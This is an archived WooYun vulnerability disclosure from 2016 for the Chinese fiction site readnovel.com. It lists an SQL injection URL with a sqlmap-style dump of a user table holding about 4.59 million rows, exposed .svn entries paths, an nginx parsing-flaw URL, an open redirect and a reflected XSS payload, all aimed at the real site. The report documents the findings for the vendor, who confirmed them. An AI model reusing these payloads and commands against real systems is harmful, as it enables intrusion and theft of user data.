当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0211322

漏洞标题:小说阅读网漏洞打包/涉及400w用户数据

相关厂商:readnovel.com

漏洞作者: Tren

提交时间:2016-05-22 09:42

修复时间:2016-07-06 22:00

公开时间:2016-07-06 22:00

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-22: 细节已通知厂商并且等待厂商处理中
2016-05-22: 厂商已经确认,细节仅向厂商公开
2016-06-01: 细节向核心白帽子及相关领域专家公开
2016-06-11: 细节向普通白帽子公开
2016-06-21: 细节向实习白帽子公开
2016-07-06: 细节向公众公开

简要描述:

rt

详细说明:

http://a.readnovel.com/usericon.php?a=load_icon_js&id=45619122,57738912,14444201,13089209,60299748,60299748,27913735,49165864,60308247,4010667,30284734,30284734,4010667,58931113,56685425,12843058,11121284,13429340,60010973,14846534
--dump -D newuc -T user_info
| user_info | 4590267 |
svn
<svn_entries> http://event.readnovel.com/RNfljh/.svn/entries
<svn_entries> http://event.readnovel.com/rnenter/.svn/entries
nginx 解析漏洞:
http://free.readnovel.com/robots.txt/a.php
http://www.readnovel.com/robots.txt/a.php
url跳转:
http://www.readnovel.com/friendlink.php?url=http%3A%2F%2Fwww.gov.cn%2F%3F1463749061.37
xss:
http://big.readnovel.com/search?ranker=ranker&keyword=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&finish_flag=finish_flag&publisherid=1finish_flag

漏洞证明:

T)}99I(PL8%YJ$BV[3E(}J0.png

修复方案:

过滤!

版权声明:转载请注明来源 Tren@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-22 21:58

厂商回复:

感谢关注小说阅读网

最新状态:

暂无


漏洞评价:

评价